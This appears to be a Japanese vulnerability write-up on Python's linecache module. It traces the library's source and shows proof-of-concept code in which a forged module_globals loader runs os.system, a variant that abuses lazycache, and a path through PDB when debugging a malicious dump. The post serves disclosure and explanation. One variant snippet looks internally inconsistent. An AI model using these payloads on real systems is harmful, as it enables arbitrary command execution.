最近、Pythonの標準ライブラリを調査する中で、linecacheモジュールに存在するRCE(リモートコード実行)の脆弱性を発見しました。この記事では、その脆弱性の詳細と実証コードを紹介します。
実証コード(PoC)
linecache.getline関数を使用してファイルの特定行をキャッシュできますが、第三引数がユーザーによって完全に制御可能な場合、RCE脆弱性が発生する可能性があります。linecache.getlinesやupdatecache関数も同様の問題を抱えています。lazycache関数もこの種の脆弱性を引き起こす可能性があります。
以下のコード例を見てみましょう:
import linecache
class malicious():
def __init__(self):
self.get_source = lambda x: [__import__('os').system(x), None][1]
fake_module = {
'__name__': 'exploit',
'__loader__': malicious()
}
result = linecache.getline('test_file', 12345, fake_module)
このコードはexploitコマンドを実行します。最後の行が脆弱性の起点(sink point)となります。以下のような変形も同様にRCEを引き起こします:
result = linecache.getlines('test_file', fake_module)
result = linecache.updatecache('test_file', fake_module)
すべての関数が直接RCEを可能にします。
import linecache
class malicious():
def __init__(self):
self.get_source = lambda x: [__import__('os').system(x), None][1]
fake_module = {
'__name__': 'exploit',
'__loader__': malicious()
}
result = linecache.getline('test_file', 12345, fake_module)
result = linecache.getlines('test_file', fake_module)
result = linecache.updatecache('test_file', fake_module)
根本原因(原理)
linecacheの概要
linecacheはPythonの標準ライブラリです。ファイルの特定行にアクセスする必要があるが、ファイル全体を順次読み込む必要がない場合に使用されます。linecacheモジュールはファイル内容をキャッシュし、任意の行に迅速にアクセスできるように設計されています。
linecacheモジュールの主な機能は、指定された行の内容を読み取り、ファイル内容をキャッシュすることです。これにより、後続の同じファイルの他の行へのアクセス時に、キャッシュから直接取得でき、重複するファイルI/O操作を回避し、パフォーマンスを向上させます。
例えば、以下のコードは1.txtの最初の行を読み取り、出力します:
import linecache
print(linecache.getline('1.txt', 1).strip())
getlineの最初の2つの引数は必須で、ファイルパスと行番号を指定します。しかし、第三引数であるmodule_globalsはオプションで、通常デフォルト値のNoneを使用します。
しかし、linecacheがmodule_globalsの処理を不適切に行うため、攻撃者が悪意のあるmodule_globalsを渡すことでRCEを引き起こす可能性があります。
攻撃経路
まず、この関数の内部処理を追跡してみましょう。
def getline(filename, lineno, module_globals=None):
"""Pythonソースファイルのキャッシュから行を取得します。
キャッシュにこのファイルのエントリがまだ存在しない場合は、キャッシュを更新します。"""
lines = getlines(filename, module_globals)
if 1 <= lineno <= len(lines):
return lines[lineno - 1]
return ''
この関数はgetlinesを呼び出しています。さらに追跡します:
def getlines(filename, module_globals=None):
"""Pythonソースファイルの行をキャッシュから取得します。
キャッシュにこのファイルのエントリがまだ存在しない場合は、キャッシュを更新します。"""
if filename in cache:
entry = cache[filename]
if len(entry) != 1:
return cache[filename][2]
try:
return updatecache(filename, module_globals)
except MemoryError:
clearcache()
return []
linecacheライブラリには、キャッシュされたコード行を格納するためのグローバル辞書cacheが存在します。getlinesはまずファイルがcacheに既にキャッシュされているかを確認します。存在しない場合は、updatecache関数に入ります。さらに追跡します。
def updatecache(filename, module_globals=None):
"""キャッシュエントリを更新し、その行リストを返します。
何か問題がある場合は、メッセージを表示し、キャッシュエントリを破棄して、空のリストを返します。"""
if filename in cache:
if len(cache[filename]) != 1:
cache.pop(filename, None)
if not filename or (filename.startswith('<') and filename.endswith('>')):
return []
fullname = filename
try:
stat = os.stat(fullname)
except OSError:
basename = filename
# 遅延ローダーに基づく検索を実行する
# それ以外の場合は、すぐに検索を試みます。
if lazycache(filename, module_globals):
try:
data = cache[filename][0]()
except (ImportError, OSError):
pass
else:
if data is None:
# 残念ながら、PEP302ローダーはこのモジュールのソースを見つけることができません。
return []
cache[filename] = (
len(data),
None,
[line + '\n' for line in data.splitlines()],
fullname
)
return cache[filename][2]
# モジュール検索パスを通じて検索を試みます。これは相対ファイル名を処理する場合にのみ有用です。
if os.path.isabs(filename):
return []
for dirname in sys.path:
try:
fullname = os.path.join(dirname, basename)
except (TypeError, AttributeError):
continue
try:
stat = os.stat(fullname)
break
except OSError:
pass
else:
return []
try:
with tokenize.open(fullname) as fp:
lines = fp.readlines()
except OSError:
return []
if lines and not lines[-1].endswith('\n'):
lines[-1] += '\n'
size, mtime = stat.st_size, stat.st_mtime
cache[filename] = size, mtime, lines, fullname
return lines
まずfilenameがキャッシュされているかを確認し、既にキャッシュされている場合は既存の内容を削除します。次にfilenameの存在を確認します。存在しない場合(OSError)はpassします。その後lazycacheに入り、私たちが遭遇する真のsinkが現れます:
data = cache[filename][0]()
updatecache関数は、私たちのcache内の内容を動的に実行します!では、lazycache関数がどのようにキャッシュを処理しているかを追跡してみましょう。
def lazycache(filename, module_globals):
"""filenameのキャッシュをmodule_globalsで初期化します。
モジュールローダーはgetlinesが呼び出されたときにのみソースを要求し、すぐには要求しません。
もしキャッシュに既にエントリが存在する場合は、変更されません。
:return: キャッシュに遅延ロードが登録されている場合はTrue、
それ以外の場合はFalse。このようなロードを登録するには、
get_sourceメソッドを持つモジュールローダーが見つかる必要があり、
filenameがキャッシュ可能なファイル名であり、
かつfilenameが既にキャッシュされていない必要があります。
"""
if filename in cache:
if len(cache[filename]) == 1:
return True
else:
return False
if not filename or (filename.startswith('<') and filename.endswith('>')):
return False
# 利用可能な場合は__loader__を試みます
if module_globals and '__loader__' in module_globals:
name = module_globals.get('__name__')
loader = module_globals['__loader__']
get_source = getattr(loader, 'get_source', None)
if name and get_source:
get_lines = functools.partial(get_source, name)
cache[filename] = (get_lines,)
return True
return False
ここで興味深い点が現れます。プログラムの想定では、module_globalsはグローバル名前空間であるため、__name__と__loader__が存在します。この関数は__loader__からget_sourceを直接取り出し、__name__をそのパラメータとしてfunctools.partialを返します。では、どのように利用するのでしょうか?
fake_module = {
'__name__': 'exploit',
'__loader__': malicious()
}
このmodule_globalsを構築します。__name__と__loader__を再定義していることがわかります。ここでは、evilクラス内に悪意のあるget_source関数を記述するだけで、この関数が実行されます!
import linecache
class malicious():
def __init__(self):
self.get_source = lambda x: __import__('os').system(x)
fake_module = {
'__name__': 'exploit',
'__loader__': malicious()
}
result = linecache.getline('test_file', 12345, fake_module)
しかし、このままではエラーが発生します。コードを見てみましょう:
try:
data = cache[filename][0]()
except (ImportError, OSError):
pass
else:
if data is None:
return []
cache[filename] = (
len(data),
None,
[line + '\n' for line in data.splitlines()],
fullname
)
return cache[filename][2]
動的実行後、返り値がNoneかどうかをチェックします。そのため、lambdaの返り値をNoneにする必要があります。PoCを修正します:
import linecache
class malicious():
def __init__(self):
self.get_source = lambda x: [__import__('os').system(x), None][1]
fake_module = {
'__name__': 'exploit',
'__loader__': malicious()
}
result = linecache.getline('test_file', 12345, fake_module)
これによりRCEが成功します。
特殊なテクニック(特殊利用)
lazycacheのパラメータが制御可能な場合、cacheに任意の内容を書き込むことができます。これは、サーバー側が手動でlazycacheのコードを実行しない限り、あまり有用ではありません。以下のようなコード:
import linecache
class malicious():
def __init__(self):
self.get_source = lambda: __import__('os').system('whoami')
fake_module = {
'__name__': 'test_file',
'__loader__': malicious()
}
result = linecache.lazycache('1', fake_module)
for i in linecache.cache.values():
for j in i:
j.func()
同様にRCEの効果を達成できます。
では、どうしてlinecacheの第三引数が制御可能になるのでしょうか?
PythonのPDBでは、以下のような関数が呼び出されています:
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
この関数はPDBを起動時に自動的に呼び出され、stack情報を表示します。print_stack_entryを追跡します:
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
prefix = '> '
else:
prefix = ' '
self.message(prefix +
self.format_stack_entry(frame_lineno, prompt_prefix))
さらにformat_stack_entryを追跡します:
def format_stack_entry(self, frame_lineno, lprefix=': '):
"""スタックエントリに関する情報を含む文字列を返します。
スタックエントリframe_linenoは(frame, lineno)のタプルです。
返される文字列には、正規のファイル名、関数名または'<lambda>'、
入力引数、戻り値、およびコードの行(存在する場合)が含まれます。
"""
import linecache, reprlib
frame, lineno = frame_lineno
filename = self.canonic(frame.f_code.co_filename)
s = '%s(%r)' % (filename, lineno)
if frame.f_code.co_name:
s += frame.f_code.co_name
else:
s += "<lambda>"
s += '()'
if '__return__' in frame.f_locals:
rv = frame.f_locals['__return__']
s += '->'
s += reprlib.repr(rv)
line = linecache.getline(filename, lineno, frame.f_globals)
if line:
s += lprefix + line.strip()
return s
この場合のframe.f_globalsが制御可能なgetlineパラメータとなります。RCEを完了できます。つまり、pickleと同様に、悪意のあるdumpを使用してPDBをデバッグすると、リモートコード実行が発生する可能性があります。
出典:https://github.com/gaogaotiantian/coredumpy/issues/59